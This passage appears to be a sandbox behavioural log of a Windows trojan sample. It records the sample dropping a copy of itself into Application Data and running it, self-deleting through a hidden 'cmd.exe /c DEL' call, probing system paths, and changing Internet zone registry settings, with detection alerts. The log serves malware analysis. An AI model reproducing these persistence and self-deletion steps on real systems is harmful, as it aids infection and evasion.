40085.           address: 0x0042207d
40086.           params:
40087.             param (id:1): 15
40088.         apicall:
40089.           timestamp: 47731
40090.           sequenceNumber: 105
40091.           processinfo:
40092.             pid: 364
40093.             imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
40094.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
40095.           dllname: kernel32.dll
40096.           apiname: Sleep
40097.           address: 0x0042207d
40098.           params:
40099.             param (id:1): 15
40100.         apicall:
40101.           timestamp: 47746
40102.           sequenceNumber: 106
40103.           processinfo:
40104.             pid: 364
40105.             imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
40106.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
40107.           dllname: kernel32.dll
40108.           apiname: Sleep
40109.           address: 0x0042207d
40110.           params:
40111.             param (id:1): 15
40112.         file:
40113.           timestamp: 47763
40114.           mode: failed
40115.           sequenceNumber: 107
40116.           value: C:\Documents and Settings\admin\Application Data\73.exe
40117.           processinfo:
40118.             tainted: true
40119.             pid: 364
40120.             imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
40121.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
40122.             ads:
40123.           fid (ads:): 0
40124.           failure: open
40125.           ntstatus: 0xc0000034
40126.           CreateOptions: 0x60
40127.           PE:
40128.             InspectionType: Ext
40129.         file:
40130.           timestamp: 47827
40131.           type: dropped_executable
40132.           mode: created
40133.           sequenceNumber: 108
40134.           value: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
40135.           processinfo:
40136.             tainted: true
40137.             pid: 364
40138.             imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
40139.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
40140.             ads:
40141.           fid (ads:): 1407374883609148
40142.           ntstatus: 0x0
40143.           CreateOptions: 0x64
40144.           PE:
40145.             InspectionType: Ext
40146.         malicious-alert:
40147.           classtype: Malicious-Directory
40148.           weight: 0
40149.           ruleid: 2213 : Executable file created in suspicious location ; Process creating executable file in suspicious location
40150.           msg: Process creating executable file in suspicious location
40151.           display-msg: Executable file created in suspicious location
40152.         malicious-alert:
40153.           classtype: misc-anom
40154.           weight: 100
40155.           ruleid: 10048 : Generic Trojan Behavior ; Generic Trojan Behavior
40156.           msg: Generic Trojan Behavior
40157.           display-msg: Generic Trojan Behavior
40158.         file:
40159.           timestamp: 47834
40160.           mode: date_change
40161.           sequenceNumber: 109
40162.           value: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
40163.           filesize: 364544
40164.           processinfo:
40165.             pid: 364
40166.             imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
40167.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
40168.           creationTime: 12/4/2015 9:43:04 PM
40169.           lastWriteTime: 12/4/2015 9:43:04 PM
40170.           changeTime: 12/4/2015 9:43:04 PM
40171.           newCreationTime: N/A
40172.           newLastWriteTime: 12/4/2015 9:43:00 PM
40173.           newChangeTime: 12/4/2015 9:43:01 PM
40174.             ads:
40175.           fid (ads:): 1407374883609148
40176.           ntstatus: 0x0
40177.           CreateOptions: 0x0
40178.         file:
40179.           timestamp: 47851
40180.           type: dropped_executable
40181.           mode: close
40182.           sequenceNumber: 110
40183.           value: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
40184.           filesize: 364544
40185.           md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
40186.           sha1sum: 8d149bc90e10db7571379dc0e62409cdcfb7427c
40187.           processinfo:
40188.             tainted: true
40189.             pid: 364
40190.             imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
40191.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
40192.             ads:
40193.           fid (ads:): 1407374883609148
40194.           ntstatus: 0x0
40195.           CreateOptions: 0x0
40196.           PE:
40197.             InspectionType: Deep
40198.             Dll: No
40199.             Machine: 0x014c
40200.             TimeDateStamp: 0x4140dee4
40201.             Characteristics:
40202.               value: 0x010f
40203.               names:
40204.                 name: Relocation info stripped
40205.                 name: Executable
40206.                 name: Line nunbers stripped
40207.                 name: Symbols stripped
40208.                 name: 32
40209.             Magic: 0x010b
40210.             Subsystem: Windows CUI
40211.             DllCharacteristics:
40212.               value: 0x0000
40213.               names:
40214.         file:
40215.           timestamp: 47861
40216.           mode: failed
40217.           sequenceNumber: 111
40218.           value: C:\Documents
40219.           processinfo:
40220.             pid: 364
40221.             imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
40222.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
40223.             ads:
40224.           fid (ads:): 0
40225.           failure: open
40226.           ntstatus: 0xc0000034
40227.           CreateOptions: 0x200000
40228.         file:
40229.           timestamp: 47865
40230.           mode: failed
40231.           sequenceNumber: 112
40232.           value: C:\Documents.exe
40233.           processinfo:
40234.             tainted: true
40235.             pid: 364
40236.             imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
40237.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
40238.             ads:
40239.           fid (ads:): 0
40240.           failure: open
40241.           ntstatus: 0xc0000034
40242.           CreateOptions: 0x200000
40243.           PE:
40244.             InspectionType: Ext
40245.         file:
40246.           timestamp: 47870
40247.           mode: failed
40248.           sequenceNumber: 113
40249.           value: C:\Documents and
40250.           processinfo:
40251.             pid: 364
40252.             imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
40253.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
40254.             ads:
40255.           fid (ads:): 0
40256.           failure: open
40257.           ntstatus: 0xc0000034
40258.           CreateOptions: 0x200000
40259.         file:
40260.           timestamp: 47875
40261.           mode: failed
40262.           sequenceNumber: 114
40263.           value: C:\Documents and.exe
40264.           processinfo:
40265.             tainted: true
40266.             pid: 364
40267.             imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
40268.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
40269.             ads:
40270.           fid (ads:): 0
40271.           failure: open
40272.           ntstatus: 0xc0000034
40273.           CreateOptions: 0x200000
40274.           PE:
40275.             InspectionType: Ext
40276.         file:
40277.           timestamp: 47881
40278.           mode: failed
40279.           sequenceNumber: 115
40280.           value: C:\Documents and Settings\admin\Application
40281.           processinfo:
40282.             pid: 364
40283.             imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
40284.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
40285.             ads:
40286.           fid (ads:): 0
40287.           failure: open
40288.           ntstatus: 0xc0000034
40289.           CreateOptions: 0x200000
40290.         file:
40291.           timestamp: 47885
40292.           mode: failed
40293.           sequenceNumber: 116
40294.           value: C:\Documents and Settings\admin\Application.exe
40295.           processinfo:
40296.             tainted: true
40297.             pid: 364
40298.             imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
40299.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
40300.             ads:
40301.           fid (ads:): 0
40302.           failure: open
40303.           ntstatus: 0xc0000034
40304.           CreateOptions: 0x200000
40305.           PE:
40306.             InspectionType: Ext
40307.         process:
40308.           timestamp: 48070
40309.           mode: started
40310.           sequenceNumber: 117
40311.           value: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
40312.           pid: 800
40313.           ppid: 364
40314.           parentname: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
40315.           cmdline: "C:\Documents and Settings\admin\Application Data\xedlc-a.exe"
40316.           filesize: 364544
40317.           md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
40318.           sha1sum: 8d149bc90e10db7571379dc0e62409cdcfb7427c
40319.             ads:
40320.           fid (ads:): 1407374883609148
40321.         malicious-alert:
40322.           classtype: Process-cloned
40323.           weight: 0
40324.           ruleid: 8032 : Process clones and starts itself ; Process clones and starts itself
40325.           msg: Process clones and starts itself
40326.           display-msg: Process clones and starts itself
40327.         apicall:
40328.           timestamp: 48076
40329.           sequenceNumber: 118
40330.           processinfo:
40331.             pid: 364
40332.             imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
40333.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
40334.           dllname: Shell32.dll
40335.           apiname: ShellExecuteW
40336.           address: 0x0041f5dd
40337.           params:
40338.             param (id:1): 0x0
40339.             param (id:2): NULL
40340.             param (id:3): C:\WINDOWS\system32\cmd.exe
40341.             param (id:4): /c DEL C:\DOCUME~1\admin\LOCALS~1\Temp\73.exe
40342.             param (id:5): NULL
40343.             param (id:6): 0
40344.         malicious-alert:
40345.           classtype: Generic-Anomalous-Activity
40346.           weight: 0
40347.           ruleid: 8006 : Hidden ShellExecute call made ; Hidden ShellExecute call made
40348.           msg: Hidden ShellExecute call made
40349.           display-msg: Hidden ShellExecute call made
40350.         file:
40351.           timestamp: 48083
40352.           mode: failed
40353.           sequenceNumber: 119
40354.           value: C:\DOCUME~1\admin\LOCALS~1\Temp\netapi32.dll
40355.           processinfo:
40356.             tainted: true
40357.             pid: 364
40358.             imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
40359.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
40360.             ads:
40361.           fid (ads:): 0
40362.           failure: open
40363.           ntstatus: 0xc0000034
40364.           CreateOptions: 0x200000
40365.           PE:
40366.             InspectionType: Ext
40367.         file:
40368.           timestamp: 48109
40369.           mode: failed
40370.           sequenceNumber: 120
40371.           value: C:\Documents and Settings\admin\Application Data\LPK.DLL
40372.           processinfo:
40373.             tainted: true
40374.             pid: 800
40375.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
40376.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
40377.             ads:
40378.           fid (ads:): 0
40379.           failure: open
40380.           ntstatus: 0xc0000034
40381.           CreateOptions: 0x200000
40382.           PE:
40383.             InspectionType: Ext
40384.         file:
40385.           timestamp: 48116
40386.           mode: failed
40387.           sequenceNumber: 121
40388.           value: C:\Documents and Settings\admin\Application Data\USP10.dll
40389.           processinfo:
40390.             tainted: true
40391.             pid: 800
40392.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
40393.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
40394.             ads:
40395.           fid (ads:): 0
40396.           failure: open
40397.           ntstatus: 0xc0000034
40398.           CreateOptions: 0x200000
40399.           PE:
40400.             InspectionType: Ext
40401.         file:
40402.           timestamp: 48121
40403.           mode: failed
40404.           sequenceNumber: 122
40405.           value: C:\DOCUME~1\admin\LOCALS~1\Temp\SETUPAPI.dll
40406.           processinfo:
40407.             tainted: true
40408.             pid: 364
40409.             imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
40410.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
40411.             ads:
40412.           fid (ads:): 0
40413.           failure: open
40414.           ntstatus: 0xc0000034
40415.           CreateOptions: 0x200000
40416.           PE:
40417.             InspectionType: Ext
40418.         regkey:
40419.           randomized: true
40420.           mode: queryvalue
40421.           sequenceNumber: 123
40422.           timestamp: 48129
40423.           value: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\ComputerName\ActiveComputerName\"ComputerName"
40424.          processinfo:
40425.            pid: 364
40426.            imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
40427.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
40428.        regkey:
40429.          randomized: true
40430.          mode: queryvalue
40431.          sequenceNumber: 124
40432.          timestamp: 48138
40433.          value: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\ComputerName\ActiveComputerName\"ComputerName"
40434.           processinfo:
40435.             pid: 800
40436.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
40437.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
40438.         file:
40439.           timestamp: 48147
40440.           mode: failed
40441.           sequenceNumber: 125
40442.           value: C:\WINDOWS\aRu2Yo48qPE
40443.           processinfo:
40444.             pid: 800
40445.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
40446.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
40447.             ads:
40448.           fid (ads:): 0
40449.           failure: open
40450.           ntstatus: 0xc0000034
40451.           CreateOptions: 0x60
40452.         file:
40453.           timestamp: 48151
40454.           mode: failed
40455.           sequenceNumber: 126
40456.           value: C:\WINDOWS\Fonts\FQ2SznG21IEC5G4
40457.           processinfo:
40458.             pid: 800
40459.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
40460.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
40461.             ads:
40462.           fid (ads:): 0
40463.           failure: open
40464.           ntstatus: 0xc0000034
40465.           CreateOptions: 0x200000
40466.         file:
40467.           timestamp: 48157
40468.           mode: failed
40469.           sequenceNumber: 127
40470.           value: C:\Documents and Settings\admin\Application Data\FQ2SznG21IEC5G4
40471.           processinfo:
40472.             pid: 800
40473.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
40474.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
40475.             ads:
40476.           fid (ads:): 0
40477.           failure: open
40478.           ntstatus: 0xc0000034
40479.           CreateOptions: 0x200000
40480.         file:
40481.           timestamp: 48162
40482.           mode: failed
40483.           sequenceNumber: 128
40484.           value: C:\DOCUME~1\admin\LOCALS~1\Temp\FQ2SznG21IEC5G4
40485.           processinfo:
40486.             pid: 800
40487.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
40488.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
40489.             ads:
40490.           fid (ads:): 0
40491.           failure: open
40492.           ntstatus: 0xc0000034
40493.           CreateOptions: 0x200000
40494.         file:
40495.           timestamp: 48166
40496.           mode: failed
40497.           sequenceNumber: 129
40498.           value: C:\WINDOWS\system32\FQ2SznG21IEC5G4
40499.           processinfo:
40500.             pid: 800
40501.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
40502.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
40503.             ads:
40504.           fid (ads:): 0
40505.           failure: open
40506.           ntstatus: 0xc0000034
40507.           CreateOptions: 0x200000
40508.         file:
40509.           timestamp: 48171
40510.           mode: failed
40511.           sequenceNumber: 130
40512.           value: C:\WINDOWS\system\FQ2SznG21IEC5G4
40513.           processinfo:
40514.             pid: 800
40515.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
40516.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
40517.             ads:
40518.           fid (ads:): 0
40519.           failure: open
40520.           ntstatus: 0xc0000034
40521.           CreateOptions: 0x200000
40522.         file:
40523.           timestamp: 48175
40524.           mode: failed
40525.           sequenceNumber: 131
40526.           value: C:\WINDOWS\FQ2SznG21IEC5G4
40527.           processinfo:
40528.             pid: 800
40529.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
40530.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
40531.             ads:
40532.           fid (ads:): 0
40533.           failure: open
40534.           ntstatus: 0xc0000034
40535.           CreateOptions: 0x200000
40536.         file:
40537.           timestamp: 48180
40538.           mode: failed
40539.           sequenceNumber: 132
40540.           value: C:\WINDOWS\system32\wbem\FQ2SznG21IEC5G4
40541.           processinfo:
40542.             pid: 800
40543.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
40544.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
40545.             ads:
40546.           fid (ads:): 0
40547.           failure: open
40548.           ntstatus: 0xc0000034
40549.           CreateOptions: 0x200000
40550.         file:
40551.           timestamp: 48184
40552.           mode: failed
40553.           sequenceNumber: 133
40554.           value: C:\Program Files\QuickTime\QTSystem\FQ2SznG21IEC5G4
40555.           processinfo:
40556.             pid: 800
40557.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
40558.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
40559.             ads:
40560.           fid (ads:): 0
40561.           failure: open
40562.           ntstatus: 0xc0000034
40563.           CreateOptions: 0x200000
40564.         file:
40565.           timestamp: 48190
40566.           mode: failed
40567.           sequenceNumber: 134
40568.           value: C:\WINDOWS\system32\WindowsPowerShell\v1.0\FQ2SznG21IEC5G4
40569.           processinfo:
40570.             pid: 800
40571.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
40572.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
40573.             ads:
40574.           fid (ads:): 0
40575.           failure: open
40576.           ntstatus: 0xc0000034
40577.           CreateOptions: 0x200000
40578.         file:
40579.           timestamp: 48195
40580.           mode: failed
40581.           sequenceNumber: 135
40582.           value: C:\Program Files\Debugging Tools for Windows (x86)\FQ2SznG21IEC5G4
40583.           processinfo:
40584.             pid: 800
40585.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
40586.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
40587.             ads:
40588.           fid (ads:): 0
40589.           failure: open
40590.           ntstatus: 0xc0000034
40591.           CreateOptions: 0x200000
40592.         file:
40593.           timestamp: 48200
40594.           mode: failed
40595.           sequenceNumber: 136
40596.           value: C:\Documents and Settings\admin\Application Data\cfgmgr32.dll
40597.           processinfo:
40598.             tainted: true
40599.             pid: 800
40600.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
40601.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
40602.             ads:
40603.           fid (ads:): 0
40604.           failure: open
40605.           ntstatus: 0xc0000034
40606.           CreateOptions: 0x200000
40607.           PE:
40608.             InspectionType: Ext
40609.         file:
40610.           timestamp: 48205
40611.           mode: failed
40612.           sequenceNumber: 137
40613.           value: C:\Documents and Settings\admin\Application Data\setupapi.dll
40614.           processinfo:
40615.             tainted: true
40616.             pid: 800
40617.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
40618.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
40619.             ads:
40620.           fid (ads:): 0
40621.           failure: open
40622.           ntstatus: 0xc0000034
40623.           CreateOptions: 0x200000
40624.           PE:
40625.             InspectionType: Ext
40626.         apicall:
40627.           timestamp: 48209
40628.           sequenceNumber: 138
40629.           processinfo:
40630.             pid: 800
40631.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
40632.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
40633.           dllname: kernel32.dll
40634.           apiname: GetSystemDirectoryW
40635.           address: 0x77927324
40636.           params:
40637.             param (id:1): 0x12f80c
40638.             param (id:2): 260
40639.         apicall:
40640.           timestamp: 48213
40641.           sequenceNumber: 139
40642.           processinfo:
40643.             pid: 800
40644.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
40645.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
40646.           dllname: kernel32.dll
40647.           apiname: GetComputerNameExW
40648.           address: 0x77927048
40649.           params:
40650.             param (id:1): 0
40651.             param (id:2): 0x12f840
40652.             param (id:3): 0x12f83c
40653.         regkey:
40654.           randomized: true
40655.           mode: queryvalue
40656.           sequenceNumber: 140
40657.           timestamp: 48218
40658.           value: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\ComputerName\ActiveComputerName\"ComputerName"
40659.          processinfo:
40660.            pid: 800
40661.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
40662.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
40663.        apicall:
40664.          timestamp: 48222
40665.          sequenceNumber: 141
40666.          processinfo:
40667.            pid: 800
40668.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
40669.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
40670.          dllname: kernel32.dll
40671.          apiname: GetComputerNameExW
40672.          address: 0x779270ab
40673.          params:
40674.            param (id:1): 3
40675.            param (id:2): 0x12f840
40676.            param (id:3): 0x12f83c
40677.        regkey:
40678.          timestamp: 48227
40679.          mode: setval
40680.          sequenceNumber: 142
40681.          value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{e319f02e-31a9-11e1-9a3f-806d6172696f}\"BaseClass" = Drive
40682.           processinfo:
40683.             pid: 364
40684.             imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
40685.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
40686.         file:
40687.           timestamp: 48234
40688.           mode: failed
40689.           sequenceNumber: 143
40690.           value: C:\WINDOWS\Fonts\R38QI00A0M0\D77273J5H4B
40691.           processinfo:
40692.             pid: 800
40693.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
40694.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
40695.             ads:
40696.           fid (ads:): 0
40697.           failure: open
40698.           ntstatus: 0xc000003a
40699.           CreateOptions: 0x200000
40700.         file:
40701.           timestamp: 48239
40702.           mode: failed
40703.           sequenceNumber: 144
40704.           value: C:\Documents and Settings\admin\Application Data\R38QI00A0M0\D77273J5H4B
40705.           processinfo:
40706.             pid: 800
40707.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
40708.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
40709.             ads:
40710.           fid (ads:): 0
40711.           failure: open
40712.           ntstatus: 0xc000003a
40713.           CreateOptions: 0x200000
40714.         file:
40715.           timestamp: 48244
40716.           mode: failed
40717.           sequenceNumber: 145
40718.           value: C:\DOCUME~1\admin\LOCALS~1\Temp\R38QI00a0m0\D77273j5H4b
40719.           processinfo:
40720.             pid: 800
40721.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
40722.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
40723.             ads:
40724.           fid (ads:): 0
40725.           failure: open
40726.           ntstatus: 0xc000003a
40727.           CreateOptions: 0x200000
40728.         file:
40729.           timestamp: 48248
40730.           mode: failed
40731.           sequenceNumber: 146
40732.           value: C:\WINDOWS\system32\R38QI00A0M0\D77273J5H4B
40733.           processinfo:
40734.             pid: 800
40735.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
40736.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
40737.             ads:
40738.           fid (ads:): 0
40739.           failure: open
40740.           ntstatus: 0xc000003a
40741.           CreateOptions: 0x200000
40742.         file:
40743.           timestamp: 48253
40744.           mode: failed
40745.           sequenceNumber: 147
40746.           value: C:\WINDOWS\system\R38QI00A0M0\D77273J5H4B
40747.           processinfo:
40748.             pid: 800
40749.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
40750.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
40751.             ads:
40752.           fid (ads:): 0
40753.           failure: open
40754.           ntstatus: 0xc000003a
40755.           CreateOptions: 0x200000
40756.         file:
40757.           timestamp: 48257
40758.           mode: failed
40759.           sequenceNumber: 148
40760.           value: C:\WINDOWS\R38QI00A0M0\D77273J5H4B
40761.           processinfo:
40762.             pid: 800
40763.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
40764.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
40765.             ads:
40766.           fid (ads:): 0
40767.           failure: open
40768.           ntstatus: 0xc000003a
40769.           CreateOptions: 0x200000
40770.         file:
40771.           timestamp: 48263
40772.           mode: failed
40773.           sequenceNumber: 149
40774.           value: C:\WINDOWS\system32\wbem\R38QI00A0M0\D77273J5H4B
40775.           processinfo:
40776.             pid: 800
40777.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
40778.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
40779.             ads:
40780.           fid (ads:): 0
40781.           failure: open
40782.           ntstatus: 0xc000003a
40783.           CreateOptions: 0x200000
40784.         apicall:
40785.           timestamp: 48300
40786.           sequenceNumber: 150
40787.           processinfo:
40788.             pid: 800
40789.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
40790.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
40791.           dllname: user32.dll
40792.           apiname: EnumWindows
40793.           address: 0x003d0eba
40794.           params:
40795.             param (id:1): 0x3d0e20
40796.             param (id:2): 0x12f5f0
40797.         apicall:
40798.           timestamp: 48305
40799.           sequenceNumber: 151
40800.           processinfo:
40801.             pid: 800
40802.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
40803.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
40804.           dllname: kernel32.dll
40805.           apiname: Sleep
40806.           address: 0x003d11cc
40807.           params:
40808.             param (id:1): 1100
40809.         file:
40810.           timestamp: 48315
40811.           mode: failed
40812.           sequenceNumber: 152
40813.           value: C:\Program Files\QuickTime\QTSystem\R38QI00A0M0\D77273J5H4B
40814.           processinfo:
40815.             pid: 800
40816.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
40817.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
40818.             ads:
40819.           fid (ads:): 0
40820.           failure: open
40821.           ntstatus: 0xc000003a
40822.           CreateOptions: 0x200000
40823.         file:
40824.           timestamp: 48321
40825.           mode: failed
40826.           sequenceNumber: 153
40827.           value: C:\WINDOWS\system32\WindowsPowerShell\v1.0\R38QI00A0M0\D77273J5H4B
40828.           processinfo:
40829.             pid: 800
40830.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
40831.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
40832.             ads:
40833.           fid (ads:): 0
40834.           failure: open
40835.           ntstatus: 0xc000003a
40836.           CreateOptions: 0x200000
40837.         file:
40838.           timestamp: 48326
40839.           mode: failed
40840.           sequenceNumber: 154
40841.           value: C:\Program Files\Debugging Tools for Windows (x86)\R38QI00A0M0\D77273J5H4B
40842.           processinfo:
40843.             pid: 800
40844.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
40845.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
40846.             ads:
40847.           fid (ads:): 0
40848.           failure: open
40849.           ntstatus: 0xc000003a
40850.           CreateOptions: 0x200000
40851.         regkey:
40852.           timestamp: 48320
40853.           mode: setval
40854.           sequenceNumber: 155
40855.           value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{e319f02c-31a9-11e1-9a3f-806d6172696f}\"BaseClass" = Drive
40856.          processinfo:
40857.            pid: 364
40858.            imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
40859.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
40860.        regkey:
40861.          timestamp: 48388
40862.          mode: added
40863.          sequenceNumber: 156
40864.          value: \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
40865.          processinfo:
40866.            pid: 364
40867.            imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
40868.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
40869.        regkey:
40870.          timestamp: 48391
40871.          mode: setval
40872.          sequenceNumber: 157
40873.          value: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\"Common Documents" = C:\Documents and Settings\All Users\Documents
40874.           processinfo:
40875.             pid: 364
40876.             imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
40877.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
40878.         mutex:
40879.           timestamp: 48398
40880.           sequenceNumber: 158
40881.           value: \BaseNamedObjects\ZonesCounterMutex
40882.           processinfo:
40883.             pid: 364
40884.             imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
40885.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
40886.         mutex:
40887.           timestamp: 48411
40888.           sequenceNumber: 159
40889.           value: \BaseNamedObjects\ZoneAttributeCacheCounterMutex
40890.           processinfo:
40891.             pid: 364
40892.             imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
40893.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
40894.         mutex:
40895.           timestamp: 48414
40896.           sequenceNumber: 160
40897.           value: \BaseNamedObjects\ZonesCacheCounterMutex
40898.           processinfo:
40899.             pid: 364
40900.             imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
40901.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
40902.         regkey:
40903.           timestamp: 48417
40904.           mode: setval
40905.           sequenceNumber: 161
40906.           value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\"ProxyBypass" = 0x00000001
40907.          processinfo:
40908.            pid: 364
40909.            imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
40910.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
40911.        regkey:
40912.          timestamp: 48421
40913.          mode: setval
40914.          sequenceNumber: 162
40915.          value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\"IntranetName" = 0x00000001
40916.           processinfo:
40917.             pid: 364
40918.             imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
40919.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
40920.         regkey:
40921.           timestamp: 48425
40922.           mode: setval
40923.           sequenceNumber: 163
40924.           value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\"UNCAsIntranet" = 0x00000001
40925.          processinfo:
40926.            pid: 364
